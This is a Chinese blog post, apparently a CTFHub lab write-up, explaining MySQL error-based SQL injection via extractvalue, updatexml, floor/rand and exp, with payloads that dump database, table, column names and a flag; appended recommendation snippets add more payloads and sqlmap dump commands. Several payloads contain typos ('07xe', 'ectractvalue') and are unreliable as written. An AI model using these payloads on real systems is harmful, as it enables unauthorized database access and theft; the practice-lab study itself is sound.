CTFHUB技能树sql注入(报错注入)

最新推荐文章于 2025-03-30 17:29:33 发布
最新推荐文章于 2025-03-30 17:29:33 发布
阅读量175 收藏 4
点赞数 9
文章标签: 网络安全 网络 sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_85133563/article/details/145169008
版权

打开环境是一个框框可以输入数据,提示输入一个1 试试,输入1 之后能看到查询语句。

返回查询正确。报错注入主要是考虑使用哪些函数,报错注入常见的函数有:
 

1.extractvalue(),是mysql中的一个函数,用于从xml文档中提取值。需要提供两个参数,分别是xml表达式和xpath表达式。主要是将xpath表达式作为参数传递给函数,然后函数根据表达式在xml片段中查找并返回结果。
extractvalue(1,concat(07xe,database(),07xe)) --+
第一个1是简单的xpath表达式,第二个参数concat(07xe,database(),07xe)是生成一个xml片段的表达式这个结果将作为xml文档的内容来处理。
xml文档:
存储和传输数据的标记语言文档。数据的存储方面:可以作为桌面软件的配置文件,编写软件的设置参数(如窗口大小,主题颜色,用户偏好等等),当软件启动时,回读取这个xml文件,根据其中的数据来设置应用程序的界面属性。
<config>
    <window>
        <width>800</width>
            <height>600</height>
           </window>
        </config>

2.updatexml()函数更新XML内容的值,它允许在数据库中的xml字段中进行动态更新和查询操作。
参数uodatexml(xml_target,xpath_exper,newvalue)
第一个参数要更新的xml字段名或者是xml类型的字符串。
第二个参数是用于定位
第三个参数是新的值。
在报错注入中使用函数的报错。
3.floor()函数
通过一个使用这个函数爆破数据库版本的语句来说明:
?id=1 ' and (select 1 from(select count(*) , concat((select (select concat(07xe,version(), 0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x) a ) %23 
这个语句看着结构很复杂,其实分析起来很简单。
主干就是and select 1 from(子查询) a )%23这是一个条件表达式,如果子查询结果失败则会报错。而这个错误是我们想要的。
现在来分析子查询语句:
select count(*) ,concat(子查询1) ,floor(0)*2)x from information_schema.tables group by x
这个语句选择了两个字段分别为count(*),用于统计行数,concat(子查询1),使用floor函数生成随机的一个值与concat()函数的查询结果拼接起来为x,使用group by 语句按照x字段进行分组。这里concat()函数与group by 语句结合使用,当concat()函数结果出现重复时,会报错,报错内容中包含concat函数的内容。那么怎么样让concat函数的结果重复?
让concat()函数与group by 语句结合使用,floor(0)*2会生成一个固定的0,1序列的值,跟concat()函数的结果拼接在一起,会导致多个字段的分组键相同,导致分组冲突因而报错,爆出concat()函数的内容。
4.exp函数
这个报错本质上是函数的溢出。如果函数的参数值超出了double的值,那么就会报错,可以通过这个特性就可以爆出数据库中敏感信息。
例如,通过exp()函数爆出数据库表明:
id=1' and exp(~(select * from (select table_name from information_schema.tables where table_schema = database() )X) %23
爆出数据库版本:
exp(~ (select version())x);
最后说明:~是按位取反符号,是对于整数的二进制取反,0变1,1变0.

在这里直接使用extractvalue()函数,开始构造payload,尝试得到数据库名:

?id =1 and extractvalue(1,concat(07xe,database(),07xe)) --+ 
爆出表名:

?id = 1 and extractvalue(1,concat(07xe,( select group_concat(table_name) from information_schema.tables where table_schema=database()),07xe)) --+

?id =1 and ectractvalue(1,(07xe,(select (concat(column_name) from information_schema.columns where table_schema=database() and table_name = 'flag')),07xe) --+

爆出来表名为flag,直接select得出来flag.

?id=1 and extractvalue (1,(select flag from flag)) --+

phoenix00009
关注
CTF HUB技能树sql注入(整型注入
2401_85133563的博客
01-15 323
那么就猜表名称是news,data这里应该会输出我们想要的数据。后面的步骤就是sql的老套路了,orderby -->爆库名--》爆表名--〉爆字段名--》拿到数据。我试了orderby 到3的时候报错,说明他有2个字段,那么就尝试一下进行联合查询, 我们的union 关键词没有被过滤,说明可以进行联合查询。打开题目是个框框里面可以输入ID,题目说了是整型注入,应该不会有引号闭合问题。果真爆出来了数据库 名,叫sqli,group_concat()函数,可以输出全部的表名,得到有一个表名为flag。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 994
CTFHUB SQL
CTFHub技能树web(持续更新)--SQL注入--报错注入
jiuyongpinyin的博客
08-14 609
报错注入 首先题目提示是报错注入,我们先尝试and 1=1 万能测试句: 发现是存在注入的,接着我们报错数据库: ?id=1 and updatexml(1,concat('~',database()),1) --+ 报错出当前数据库sqli,接着我们报错出列: ?id=1 and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='s
报错注入常见函数原理
p_utao的博客
11-04 752
floor函数 select count(*),(floor(rand(0)*2))x from table group by x; select查询语句 group by进行分组(相同为一组) rand()生成0到1的随机数 floor()返回整数 count()对数据整合(类似去重) 产生原因:mysql在执行该语句会建立一个虚拟表,表中有两个字段(一个是分组的值和一个计数的值),当分组已经存在后就会爆错。 参考:http://www.cnblogs.com/sfriend/p/11365999.ht
ctfhub-技能树-sql注入
最新发布
weixin_64359465的博客
03-30 1019
sqlmap -r c:\2.txt -D 【数据库名】 -T 【表名】 -C xxx,xxx(字段名字) --dump 爆数据。sqlmap -r c:\2.txt -D 【数据库名】 -T 【表名】 --columns 爆指定库和表的字段名字。sqlmap -r c:\2.txt -D 【数据库名】 --tables 爆指定库的表名。(接下来注意:要将1变成-1,否则前面不报错后面就不回显了)sqlmap -r ---指定数据包。sqlmap -u ---指定连接。
CTFHub 技能树报错注入
qq_47271638的博客
05-28 631
首先测试注入点 and1=1 ;'and 1=1 ;'and 1=2, ?id=2-1;一起加上测试 发现没有回显初步判断可能是报错注入或者是时间盲注或者布尔盲注; 假设为报错注入. 查询数据库 构造注入语句 : ?id=1 and updatexml(1,concat(’~’,(select database())),1)– 得到数据库名:sqli 查询数据表 构造注入语句:?id=1 and updatexml(1,concat(’~’,(select group_concat(table_name
CTFHub_技能树_Web之SQL注入——报错注入详细原理讲解(含三种解法原理讲解)
Ho1aAs‘s Blog
12-20 1155
文章目录一、报错注入原理报错注入常用函数floor()extractvalue()、updatexml()原理二、注入过程Ⅰ、使用floor()1.查询表名2.查询列名3.查值Ⅱ、使用extractvalue()1.查询表名2.查询列名3.查值Ⅲ、使用updatexml()1.查询表名2.查询列名3.查值 一、报错注入原理 报错注入,通过运行SQL查询语句,回显查询结果。由于某些函数的神奇操作会使得传入参数先运行,而被报错抛出,能够直接查看参数的运行情况,因而实现查询。 报错注入常用函数 《代码审计:企业
CTFHub 报错注入
weixin_44732566的博客
02-20 4325
CTFHub 报错注入注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入错误SQL代码会报错,并且是通过mysql_error(),mysqli_error()等返回错误。 ...
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5742
Ctfhub解题 web SQL注入
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 646
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
CTFHub技能树--整型注入
qq_59099375的博客
06-18 160
3.开始爆破库名,通过联合查询语句,联合查询之前的值设为一个不存在的值,不然显示不出来。4.通过group_concat()函数和information_schema爆破表名,1.按照题目要求输入1出现回显,首先判断是否有注入点,由于题目指明了整型注入。2.判断回显位,输入1和2是有回显的,输入3报错可知该表中字段只有两列。得到两个表名,可想而知我们的flag存在flag表中。得到数据库名为sqli。6.开始爆破具体内容。
CTFHUB-WEB-SQL注入-报错注入
weixin_43486981的博客
08-10 830
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 题目: 靶机环境:输入1时,显示正确 输入一个随意的字符串后,显示错误。 求数据库名:输入1 union select updatexml(1,concat(0x7e,database(),0x7e),1);,页面报错: 求表名:输入1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information
CTFHUB报错注入的几种不同方式
PigletTT的博客
07-04 1192
CFTHUB 报错注入 一、报错注入原理 1.xml函数updatexml() UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称; 第二个参数:XPath_string (Xpath格式的字符串); 第三个参数:new_value,String格式,替换查找到的符合条件的数据; 该函数对XPath_string进行查询操作,如果符合语法格式要求,则用第三个参数替换,不符合语法格
题解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2508
数据库注入
ctfhub技能树web--sql注入
m0_64636395的博客
05-15 1011
SQL 注入是一种将 SQL 代码插入或添加到应用(用户)的输入参数中,之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。攻击者能够修改 SQL 语句,该进程将与执行命令的组件(如数据库服务器、应用服务器或 WEB 服务器)拥有相同的权限。如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询(该查询在数据库服务器上执行)之前已经对其进行过验证,通常就会出现 SQL 注入漏洞。提示:以下是本篇文章正文内容,下面案例可供参考。
CTFHub技能树--sql注入报错注入步骤详解
wqatss的博客
11-18 910
这篇主要是sql注入--报错注入步骤详解,很详细
CTFHub - 报错注入
Have_a_great_day的博客
09-09 1207
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHub笔记之技能树-web:报错注入
weixin_48799157的博客
03-19 476
小白一个,如有错误请指正! 对这方面不是很熟悉,补了一下知识点: https://blog.youkuaiyun.com/silence1_/article/details/90812612https://blog.youkuaiyun.com/silence1_/article/details/90812612 解法一: 1.用extractvalue()函数爆数据库 select * from news where id=1 and (select extractvalue(1,concat(0x7e,(select
CTFHUB技能树SQL——报错注入
weixin_73049307的博客
10-16 937
显示出'1''和报错信息,说明没有闭合情况,是报错注入且是整数型注入。正常显示报错信息,确定报错函数updatexml()可以使用。没有回显出相关信息,初步判断是报错注入、时间盲注或布尔盲注。得到表名是news和flag,其中flag表是我们要找的。说明数据库名是sqli。一样成功得到flag。
ctfhub sql注入cookie
06-06
题目内容大致为:“CTFHub SQL注入cookie”,需要进行进一步的解释和回答。 首先,“CTFHub”是指一种网络安全比赛形式,全称为“Capture The Flag Hub”,所以这道题是CTFHub比赛的一个部分。 其次,“SQL注入”是一种常见的网络攻击手段,通过在输入框等可输入的地方输入特定的数据库操作语句,来实现对数据库的非授权操作。 最后,“cookie”是指在网站上存储用户信息的一种机制,可以通过注入SQL语句来获取其中的敏感信息,如账号密码等。 综上,这道题的意思是在一个CTFHub比赛的环境下,需要使用SQL注入来获取网站的cookie信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值